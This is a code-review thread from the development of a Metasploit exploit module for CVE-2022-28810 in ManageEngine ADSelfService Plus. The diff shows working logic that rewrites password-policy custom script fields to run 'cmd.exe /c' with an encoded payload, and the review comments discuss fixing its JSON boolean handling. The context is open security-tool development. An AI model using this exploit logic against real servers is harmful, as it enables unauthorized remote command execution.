modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb

```diff
@@ -0,0 +1,307 @@
+    policy_details_json = policy_json['POLICY_DETAILS']
+    fail_with(Failure::UnexpectedReply, "The target didn't have any configured policies") if policy_details_json.nil?
+
+    # There can be multiple policies. This logic will loop over each one, grab the configuration
+    # details, update the configuration to include our payload, and then POST it back.
+    policy_details_json.each do |policy_entry|
+      policy_id = policy_entry['POLICY_ID']
+      policy_name = policy_entry['POLICY_NAME']
+      fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?
+
+      print_status("Requesting policy details for #{policy_name}")
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),
+        'vars_get' =>
+        {
+          'POLICY_ID' => policy_id
+        }
+      })
+      fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200
+
+      # load the JSON and insert (or remove) our payload
+      specific_policy_json = res.get_json_document
+      fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if specific_policy_json.nil?
+      fail_with(Failure::UnexpectedReply, "The target didn't contain the expected JSON") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?
+      new_payload = "cmd.exe /c #{payload.encoded}"
+
+      if datastore['TARGET_RESET']
+        print_status('Disabling custom script functionality')
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'
+        specific_policy_json['SCRIPT_COMMAND_RESET'] = ''
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'
+        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''
+      else
+        print_status('Enabling custom scripts and inserting the payload')
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'
+        specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'
+        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload
+      end
+
+      # this is insane. the json blob that *ManageEngine* gives us has to be filtered in order
+      # to send it back to *ManageEngine* :scream: Specifically, ADSP is very unhappy about all
+      # the booleans using "true" or "false" instead of "1" or "0" *except* for HIDE_CAPTCHA_RPUA
+      # which has to remain a boolean. Sounds unbelievable, right? But here we are.
+      updated_policy = specific_policy_json.to_json
+      updated_policy = updated_policy.gsub('true', '1')
+      updated_policy = updated_policy.gsub('false', '0')
+      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":0', 'HIDE_CAPTCHA_RPUA":false')
+      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":1', 'HIDE_CAPTCHA_RPUA":true')
```

Comment:
This is a little concerning because you could also be modifying the payload. Would something that updates the hash by performing the necessary translations work?

It's a little more code, but it should only modify the intended values.

```suggestion
      updated_policy = specific_policy_json.map do |key, value|
        if key == 'HIDE_CAPTCHA_RPUA'
          [key, value]
        elsif value.is_a? TrueClass
          [key, 1]
        elsif value.is_a? FalseClass
          [key, 0]
        else
          [key, value]
        end
      end.to_h.to_json
```

Reply:
Yeah, what I wrote was a absolutely a hack. This version is much more elegant. Unfortunately, the JSON blob has nested hashes/arrays so I made it ugly again :rofl: Here is the current in test version. I'll get a new revision up for review this morning:

```
  def fix_adssp_json(json_hash)
    json_hash.map do |key, value|
      if value.is_a? Hash
        [key, fix_adssp_json(value)]
      elsif value.is_a? Array
        value = value.map do |array_val|
          if array_val.is_a? Hash
            array_val = fix_adssp_json(array_val)
          end
          array_val
        end
        [key, value]
      elsif key == 'HIDE_CAPTCHA_RPUA'
        [key, value]
      elsif value.is_a? TrueClass
        [key, 1]
      elsif value.is_a? FalseClass
        [key, 0]
      else
        [key, value]
      end
    end.to_h
  end
```